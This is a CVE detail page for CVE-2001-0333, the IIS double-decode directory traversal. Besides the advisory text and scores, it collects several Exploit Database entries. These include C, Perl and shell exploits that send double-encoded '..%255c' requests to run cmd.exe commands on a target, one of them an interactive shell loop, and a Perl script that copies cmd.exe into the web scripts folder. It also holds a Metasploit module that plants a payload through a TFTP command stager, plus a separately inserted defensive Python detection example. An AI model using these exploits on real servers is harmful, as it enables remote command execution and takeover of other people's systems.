CVE-2001-0333 : Detail

CVE-2001-0333

8.5%V3
Network
2001-09-18 02h00 +00:00
2004-09-02 07h00 +00:00

CVE Description

Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector                 | Source
V2      | 7.5   | HIGH     | AV:N/AC:L/Au:N/C:P/I:P/A:P | [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile therefore lets you compare one CVE's EPSS score against the rest.

Exploit information

Exploit Database EDB-ID : 20835

Publication date : 2001-05-14 22h00 +00:00
Author : Filip Maertens
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/2708/info

Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.

When IIS receives a CGI filename request, it automatically performs two actions before completing the request:

1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.
2. When the security check is completed, IIS decodes CGI parameters.

A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.

Note that arbitrary commands will be run with the IUSR_machinename account privileges.

Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.

Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.

The worm Nimda (and variants) actively exploits this vulnerability.

/*
 *
 * execiis.c - (c)copyright Filip Maertens
 * BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error
 *
 * DISCLAIMER: This is proof of concept code. This means, this code
 * may only be used on approved systems in order to test the availability
 * and integrity of machines during a legal penetration test. In no way
 * is the author of this exploit responsible for the use and result of
 * this code.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <unistd.h>
#include <string.h>

/* Modify this value to whichever sequence you want.
 *
 * %255c = %%35c = %%35%63 = %25%35%63 = /
 *
 */
#define SHOWSEQUENCE "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"

int main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    char recvbuffer[1], stuff[200] = "";   /* request buffer must start empty before strcat() */
    int create_socket;

    printf("iisexec.c | Microsoft IIS CGI Filename Decode Error | <[email protected]>\n-------------------------------------------------------------------------\n");

    if (argc < 3)
    {
        printf(" -- Usage: iisexec [ip] [command]\n");
        exit(0);
    }

    if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
        printf(" -- Socket created.\n");

    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    sin.sin_addr.s_addr = inet_addr(argv[1]);

    if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
        printf(" -- Connection made.\n");
    else
    {
        printf(" -- No connection.\n");
        exit(1);
    }

    /* Build the raw HTTP request: traversal sequence + command */
    strcat(stuff, "GET ");
    strcat(stuff, SHOWSEQUENCE);
    strcat(stuff, argv[2]);
    strcat(stuff, " HTTP/1.0\n\n");

    memset(recvbuffer, '\0',sizeof(recvbuffer));

    send(create_socket, stuff, sizeof(stuff), 0);
    recv(create_socket, recvbuffer, sizeof (recvbuffer),0);

    if ( ( strstr(recvbuffer,"404") == NULL ) )
    {
        printf(" -- Command output:\n\n");
        while(recv(create_socket, recvbuffer, 1, 0) > 0)
        {
            printf("%c", recvbuffer[0]);
        }
    }
    else
        printf(" -- Wrong command processing. \n");

    close(create_socket);
    return 0;
}
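The ordering flaw described above (decode the filename once, run the security check, then decode again before use) is what a defender needs to reproduce in order to detect or close it. The following is an added example, not code from the page or from any of the exploit authors listed here: it canonicalises a request path by decoding until the string stops changing, shows the check-after-one-decode order beside the check-after-full-decode order, and runs a classifier over a few constructed W3C-style IIS log lines (sample data, not real traffic). Python's urllib.parse.unquote stands in for the server's decoder, on the assumption that it resolves the sequences the page lists (%255c, %%35c, %25%35%63, .%252e) to the same characters.

```python
"""Double-decode traversal check for request paths (CVE-2001-0333 pattern).

Added example; not code from the page or from the exploit authors above.
Models the advisory's ordering flaw: decode once, check, then decode again,
so a ".." hidden behind a twice-encoded separator passes the check and
still reaches the filesystem.  urllib.parse.unquote stands in for the
server's decoder (assumption: same result for the sequences on the page).
"""
import re
from urllib.parse import unquote

# A ".." path component under either separator; IIS accepted "\" as well as "/".
_DOTDOT = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def decode_rounds(path, max_rounds=5):
    """Return [raw, decoded once, decoded twice, ...] until decoding stops changing it."""
    rounds = [path]
    while len(rounds) <= max_rounds:
        nxt = unquote(rounds[-1])
        if nxt == rounds[-1]:
            break
        rounds.append(nxt)
    return rounds


def has_traversal(path):
    return _DOTDOT.search(path) is not None


def check_after_single_decode(path):
    """Vulnerable order from the advisory: decode once, check (then decode again).
    Returns True when the request would be allowed through."""
    return not has_traversal(unquote(path))


def check_after_full_decode(path):
    """Hardened order: canonicalise until stable, then check the final form."""
    return not has_traversal(decode_rounds(path)[-1])


def classify(path):
    """Label a request path for detection purposes."""
    rounds = decode_rounds(path)
    # Visible raw or after one decode: an ordinary traversal attempt.
    if any(has_traversal(r) for r in rounds[:2]):
        return "plain-traversal"
    # Only appears after a further decode round: the CVE-2001-0333 gap.
    if has_traversal(rounds[-1]):
        return "double-decode-traversal"
    return "clean"


# Constructed W3C-style IIS log lines (not real traffic) for the scan below.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-16 10:01:02 10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 200
2001-05-16 10:01:09 10.0.0.5 GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe /c+dir 200
2001-05-16 10:02:11 10.0.0.7 GET /index.htm - 200
2001-05-16 10:03:40 10.0.0.9 GET /scripts/../../winnt/system32/cmd.exe /c+dir 403
"""


def scan_log(text):
    """Return (client ip, uri stem, verdict) for every non-clean request in the log."""
    flagged = []
    for line in text.splitlines():
        if not line or line.startswith('#'):
            continue
        fields = line.split()
        if len(fields) < 5:
            continue
        verdict = classify(fields[4])
        if verdict != "clean":
            flagged.append((fields[2], fields[4], verdict))
    return flagged


if __name__ == "__main__":
    for ip, stem, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:24} {ip:10} {stem}")
```

Run the classifier on the raw request line as the server saw it: a log pipeline that stores an already-decoded stem would show only the `%5c` or `\` form, and the fact that a second decode round was needed is lost. The hardened check is the one to copy into any path-validation code: canonicalise until the string is stable and only then apply the traversal test.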
Exploit Database EDB-ID : 20836

Publication date : 2001-05-15 22h00 +00:00
Author : HuXfLuX
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/2708/info

/*
   IISEX by HuXfLuX <[email protected]>.
   IIS CGI File Decode Bug exploit.
   Written 16-05-2001.
   Compiles on Linux, works with IIS versions 3, 4 and 5.
   Microsoft's products were always famous for their backward compatibility!
   You can change the SHOWSEQUENCE value to some other strings that also work.
   More info: http://www.nsfocus.com
   Thanx to Filip Maertens <[email protected]>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

#define SHOWSEQUENCE "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+"

int resolv(char *hostname,struct in_addr *addr);

int main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct in_addr victim;
    char recvbuffer[1], stuff[200]="";
    int create_socket;

    printf("IISEX by HuxFlux <[email protected]>\nThis exploits the IIS CGI Filename Decode Error.\nWorks with IIS versions 3, 4 and 5!.\n");

    if (argc < 3)
    {
        printf("[?] Usage: %s [ip] [command]\n", argv[0]);
        exit(0);
    }

    if (!resolv(argv[1],&victim))
    {
        printf("[x] Error resolving host.\n");
        exit(-1);
    }

    printf("\n[S] Exploit procedure beginning.\n");

    if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
        printf("[*] Socket created.\n");

    bzero(&sin,sizeof(sin));
    memcpy(&sin.sin_addr,&victim,sizeof(struct in_addr));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    //sin.sin_addr.s_addr = inet_addr(argv[1]);

    if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
        printf("[*] Connection made.\n");
    else
    {
        printf("[x] No connection.\n");
        exit(1);
    }

    strcat(stuff, "GET ");
    strcat(stuff, SHOWSEQUENCE);
    strcat(stuff, argv[2]);
    strcat(stuff, " HTTP/1.0\r\n\r\n");

    printf("[*] Sending: %s", stuff);

    memset(recvbuffer, '\0',sizeof(recvbuffer));

    send(create_socket, stuff, sizeof(stuff), 0);

    if ( strstr(recvbuffer,"404") == NULL )
    {
        printf("[*] Command output:\n\n");
        while(recv(create_socket, recvbuffer, 1, 0) > 0)
        {
            printf("%c", recvbuffer[0]);
        }
        printf("\n\n");
    }
    else
        printf("[x] Wrong command processing. \n");

    printf("[E] Finished.\n");
    close(create_socket);
    return 0;
}

/* Accept either a dotted-quad address or a hostname */
int resolv(char *hostname,struct in_addr *addr)
{
    struct hostent *res;

    if (inet_aton(hostname,addr))
        return(1);

    res = gethostbyname(hostname);
    if (res == NULL)
        return(0);

    memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
    return(1);
}
Exploit Database EDB-ID : 20837

Publication date : 2001-05-14 22h00 +00:00
Author : Cyrus The Gerat
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2708/info

#!/usr/bin/perl
# Written by Cyrus The Gerat , [email protected] , May 15th 2001
# This perl script lets you to test the vulnerable servers to IIS4/5 CGI decode hole,
# Also you can exploit the hole and execute your commands remotely!
# Vulnerability found by NSfocus security team,
# Tested for compatibility on UNIX/WINDOWS (activestate perl)
# Works well on windows and unix platforms,

$ARGC=@ARGV;
if ($ARGC <3) {
    print "\n\nRemote IIS4/5 decode hole tester! By CyrusTheGreat ,CyrusArmy\@Bigfoot.com\n";
    print "\n Usage:\n\n $0 <victim host> <victim port> <command line to execute>\n\n";
    print " Victim Host: Address of IIS4/5 server vulnerable to decode hole! \n";
    print " Victim port: HTTP/HTTPS port 80 or 443\n";
    print " Command to Execute: for example \"echo Just hacked! > hacked.txt\" \n\n";
    exit;
}

use Socket;
my ($host,$port,$target,$notvulnerable,$notfound,$notcopied,$accessdenied);
$host=$ARGV[0];
$port=$ARGV[1];
$target=inet_aton($host);
$notvulnerable=1;
$notfound=1;
$accessdenied=0;

print "\nRemote IIS4/5 decode hole tester! By CyrusTheGreat ,CyrusArmy\@Bigfoot.com\n";
print "Connecting to server $host port $port..., \n\n";

# Probe: run "ver" through the double-encoded path and look for its banner
@results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver HTTP/1.0\r\n\r\n");
for ($i=0; $i <=7 ;$i++ ) {
    print $results[$i];
}
foreach $line (@results){
    if ($line =~ /\[Version/) {
        $notvulnerable=0;
        print "\nWow! system is vulnerable.\n";
        print $line;
    }
}
if ($notvulnerable) {
    print "\nOops! System is not vulnerable. \n";
    exit(1);
}
# you can exchange Wow! and Oops! as you prefer! ;-)

print "\nChecking for command interpreter...\n";
@results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir%20cyrus%2eexe HTTP/1.0\r\n\r\n");
#print @results;
foreach $line (@results){
    if ($line =~ /cyrus.exe/) {$notfound=0;}
}
if ($notfound) {
    print "Command interpreter not found, Trying to copy cmd.exe \n";
    @results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd%2eexe+cyrus%2eexe HTTP/1.0\r\n\r\n");
    #print @results;
}
foreach $line (@results){
    if (($line =~ /denied/ )) {$accessdenied=1;}
}
if ($accessdenied) {
    print"Cannot copy command interpreter, Try manually! \n\n";
    exit(2);
} else {
    print "Command interpreter OK \n";
}

$command=@ARGV[2];
print "Now executing your command: $command \n\n";
#$command=~s/ /\%20/g;
$command =~ s/(\W)/sprintf("%%%x", ord($1))/eg;
#print $command;
my @results=sendraw("GET /scripts/cyrus.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;

print STDOUT "\n\nMore commands? , or EOF to end:\n";
while ($command = <STDIN>) {
    print "You said: $command \n";
    chop $command;
    $command =~ s/(\W)/sprintf("%%%x", ord($1))/eg;
    my @results=sendraw("GET /scripts/cyrus.exe?/c+$command HTTP/1.0\r\n\r\n");
    print @results;
    print "\n\nTell me more, or EOF (^D/^Z) to end:\n";
}
print "\nThat's all! Another IIS hole just similified by cyrus!\n";

# Send a raw request string and return the response lines
sub sendraw {
    my ($pstr)=@_;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        my @in;
        select(S); $|=1;
        print $pstr;
        while(<S>){ push @in, $_;}
        select(STDOUT); close(S);
        return @in;
    } else {
        print "Cannot connect to $host port $port\n";
        exit(3);
    }
}
Exploit Database EDB-ID : 20838

Publication date : 2001-05-14 22h00 +00:00
Author : MovAX
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/2708/info

/*
   lalaiis.c (or Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability)
   Bugtraq id: 2708

   It gives you a "shell-like" environment to test your IIS servers

   Coded by MovAX <[email protected]>

   Greetz to: lala, HeH! Magazine staff <http://www.dtmf.com.ar/digitalrebel>
   Fuckz to: Feel free to add your handle to this section.
*/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>   /* close(), alarm() */

void usage(void)
{
    fprintf(stderr, "\nusage: ./lalaiis <website> <vulnerable_directory>");
    fprintf(stderr, "\nwhere vulnerable_directory can be any 'scriptable' dir (like scripts msadc)");
    fprintf(stderr, "\nex: ./lalaiis www.foo.bar scripts\n");
    exit(-1);
}

int main(int argc, char **argv)
{
    int i, le_socket, le_connect_error;
    int le_timeout=80;   /* connect timeout; was left uninitialised before alarm() */
    int timeout=80;
    int port=80;
    char temp[1];
    char host[512]="";
    char command[1024]="";
    char request[8192]="GET /";
    struct hostent *he;
    struct sockaddr_in s_addr;

    printf(":: lalaiis.c exploit. Coded by MovAX\n");

    if (argc < 3)
        usage();

    strncpy(host, argv[1], sizeof(host));
    if(!strcmp(host, ""))
    {
        fprintf(stderr, "put a damn server\n");
        usage();
    }

    printf("\n:: Destination host > %s:%d\n", host, port);

    if((he=gethostbyname(host)) == NULL)
    {
        fprintf(stderr, "put a damn VALID server\n");
        usage();
    }

    for (;;)
    {
        command[0]=0;
        printf("\nlala_shell> ");
        if(fgets(command, sizeof(command), stdin) == NULL)
            perror("gets");
        command[strlen(command)-1]='\0';

        if(!strcmp("logout", command))
            exit(-1);

        /* spaces become '+' so the command survives as a query string */
        for(i=0;i<strlen(command);i++)
        {
            if(command[i]==' ') command[i]='+';
        }

        strncpy(request, "GET /", sizeof(request));
        strncat(request, argv[2], sizeof(request) - strlen(request));
        strncat(request, "/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+", sizeof(request) - strlen(request));
        strncat(request, command, sizeof(request) - strlen(request));
        strncat(request, " HTTP/1.1\n", sizeof(request) - strlen(request));
        strncat(request, "host:" ,sizeof(request) - strlen(request));
        strncat(request, argv[1], sizeof(request) - strlen(request));
        strncat(request, "\n\n", sizeof(request) - strlen(request));

        s_addr.sin_family = AF_INET;
        s_addr.sin_port = htons(port);
        memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, sizeof(s_addr.sin_addr));

        if((le_socket=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
        {
            perror("socket\n");
            exit(-1);
        }

        alarm(le_timeout);
        le_connect_error = connect(le_socket,(struct sockaddr *)&s_addr,sizeof(s_addr));
        alarm(0);

        if(le_connect_error==-1)
        {
            perror("connect");
            close(le_socket);
            exit(-1);
        }

        send(le_socket, request, strlen(request), 0);

        while(recv(le_socket,temp,1, 0)>0)
        {
            alarm(timeout);
            printf("%c", temp[0]);
            alarm(0);
        }

        close(le_socket);   /* one connection per command; do not leak the descriptor */
    }

    return 0;
}
Exploit Database EDB-ID : 20839

Publication date : 2001-05-14 22h00 +00:00
Author : Leif Jakob
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2708/info

#!/bin/sh
# Copyright 2001 by Leif Jakob <[email protected]>
#
# do not abuse this code... blah blah :)

if [ -z "$1" ] ; then
  echo "usage:"
  echo "$0 hostname"
  exit 1
fi

host="$1"

NETCAT=`which netcat`
if [ -z "$NETCAT" ] ; then
  NETCAT=`which nc`
fi
if [ -z "$NETCAT" -o ! -x "$NETCAT" ] ; then
  echo "you need netcat to make this work"
  exit 1
fi
echo "using netcat:$NETCAT"

# Emit a raw HTTP request with $count repetitions of the double-encoded "..\"
function makeRequest
{
  host="$1"
  count=$2
  cmd="$3"
  echo -n 'GET /scripts/'
  while [ $count -gt 0 ] ; do
    echo -n '..%255c'
    count=$((count-1))
  done
  echo -n 'winnt/system32/cmd.exe?/c+'
  echo -n "$cmd"
  echo ' HTTP/1.0'
  echo "Host: $host"
  echo ''
  echo 'dummy'
}

function testHost
{
  host="$1"
  count=10 # you can't overdo it
  cmd='dir+c:\'
  # use the netcat binary located above rather than a hard-coded name
  makeRequest "$host" "$count" "$cmd" | "$NETCAT" -w 4 $host 80
}

testHost "$host"
Exploit Database EDB-ID : 20840

Publication date : 2001-05-14 22h00 +00:00
Author : A.Ramos
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2708/info

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20840.tgz
Exploit Database EDB-ID : 20841

Publication date : 2001-05-14 22h00 +00:00
Author : Gary O'Leary-Steele
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2708/info

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20841.zip
Exploit Database EDB-ID : 20842

Publication date : 2001-05-14 22h00 +00:00
Author : Roelof
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2708/info

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20842.tgz
Exploit Database EDB-ID : 16467

Publication date : 2011-01-07 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: ms01_026_dbldecode.rb 11513 2011-01-08 00:25:44Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/proto/tftp'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # NOTE: This cannot be an HttpClient module since the response from the server
  # is not a valid HttpResponse
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStagerTFTP

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft IIS/PWS CGI Filename Double Decode Command Execution',
      'Description'    => %q{
          This module will execute an arbitrary payload on a Microsoft IIS installation
        that is vulnerable to the CGI double-decode vulnerability of 2001.

        NOTE: This module will leave a metasploit payload in the IIS scripts directory.
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 11513 $',
      'References'     =>
        [
          [ 'CVE', '2001-0333' ],
          [ 'OSVDB', '556' ],
          [ 'BID', '2708' ],
          [ 'MSB', 'MS01-026' ],
          [ 'URL', 'http://marc.info/?l=bugtraq&m=98992056521300&w=2' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 15 2001'
    ))

    register_options(
      [
        Opt::RPORT(80),
        OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ])
      ], self.class)

    framework.events.add_exploit_subscriber(self)
  end

  # One of the double-encoded "../" or "..\" spellings that IIS resolves on its second decode
  def dotdotslash
    possibilities = [
      "..%255c",
      "..%%35c",
      "..%%35%63",
      "..%25%35%63",
      ".%252e/",
      "%252e./",
      "%%32%65./",
      ".%%32%65/",
      ".%25%32%65/",
      "%25%32%65./"
    ]
    possibilities[rand(possibilities.length)]
  end

  def mini_http_request(opts, timeout=5)
    connect

    req = ''
    req << opts['method']
    req << ' '
    req << opts['uri']
    req << ' '
    req << "HTTP/1.0\r\n"
    req << "Host: #{datastore['RHOST']}\r\n"
    req << "\r\n"

    sock.put(req)

    # This isn't exactly awesome, but it seems to work..
    begin
      headers = sock.get_once(-1, timeout)
      body = sock.get_once(-1, timeout)
    rescue ::EOFError
      # nothing
    end

    if (datastore['DEBUG'])
      print_status("Headers:\n" + headers.inspect)
      print_status("Body:\n" + body.inspect)
    end

    disconnect

    [headers, body]
  end

  def check
    res = execute_command("dir")
    if (res.kind_of?(Array))
      body = res[1]
      if (body and body =~ /Directory of /)
        return Exploit::CheckCode::Vulnerable
      end
    end
    Exploit::CheckCode::Safe
  end

  #
  # NOTE: the command executes regardless of whether or not
  # a valid response is returned...
  #
  def execute_command(cmd, opts = {})
    # Don't try the start command...
    # Using the "start" method doesn't seem to make iis very happy :(
    return [nil,nil] if cmd =~ /^start [a-zA-Z]+\.exe$/

    print_status("Executing command: #{cmd}")

    uri = '/scripts/'
    exe = opts[:cgifname]
    if (not exe)
      uri << dotdotslash
      uri << dotdotslash
      uri << 'winnt/system32/cmd.exe'
    else
      uri << exe
    end
    uri << '?/x+/c+'
    uri << Rex::Text.uri_encode(cmd)

    if (datastore['VERBOSE'])
      print_status("Attemping to execute: #{uri}")
    end

    mini_http_request({
      'uri' => uri,
      'method' => 'GET',
    }, 20)
  end

  def exploit
    # first copy the file
    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
    print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
    # NOTE: this assumes %SystemRoot% on the same drive as the web scripts directory
    # However, it using %SystemRoot% doesn't seem to work :(
    res = execute_command("copy \\winnt\\system32\\cmd.exe #{exe_fname}")

    if (datastore['CMD'])
      res = execute_command(datastore['CMD'], { :cgifname => exe_fname })
      if (res[0])
        print_status("Command output:\n" + res[0])
      else
        print_error("No output received")
      end
      res = execute_command("del #{exe_fname}")
      return
    end

    # Use the CMD stager to get a payload running
    execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })

    # Save these file names for later deletion
    @exe_cmd_copy = exe_fname
    @exe_payload = payload_exe

    # Just for good measure, we'll make a quick, direct request for the payload
    # Using the "start" method doesn't seem to make iis very happy :(
    print_status("Triggering the payload via a direct request...")
    mini_http_request({ 'uri' => '/scripts/' + payload_exe, 'method' => 'GET' }, 1)

    handler
  end

  #
  # The following handles deleting the copied cmd.exe and payload exe!
  #
  def on_new_session(client)
    if client.type != "meterpreter"
      print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
      print_error("The copied exe and the payload exe must be removed manually.")
      return
    end

    return if not @exe_cmd_copy

    # stdapi must be loaded before we can use fs.file
    client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")

    # Delete the copied CMD.exe
    print_status("Deleting copy of CMD.exe \"#{@exe_cmd_copy}\" ...")
    client.fs.file.rm(@exe_cmd_copy)

    # Migrate so that we can delete the payload exe
    client.console.run_single("run migrate -f")

    # Delete the payload exe
    return if not @exe_payload
    delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload
    print_status("Changing permissions on #{delete_me_too} ...")
    cmd = "C:\\winnt\\system32\\attrib.exe -r -h -s " + delete_me_too
    client.sys.process.execute(cmd, nil, {'Hidden' => true })
    print_status("Deleting #{delete_me_too} ...")
    begin
      client.fs.file.rm(delete_me_too)
    rescue ::Exception => e
      print_error("Exception: #{e.inspect}")
    end
  end

  def cleanup
    framework.events.remove_exploit_subscriber(self)
  end

end

Products Mentioned

Configuration 0

Microsoft >> Internet_information_server >> Version: up to (including) 5.0

Microsoft >> Internet_information_server >> Version: 4.0

References

http://www.cert.org/advisories/CA-2001-12.html
Tags : third-party-advisory, x_refsource_CERT
http://www.securityfocus.com/bid/2708
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=98992056521300&w=2
Tags : mailing-list, x_refsource_BUGTRAQ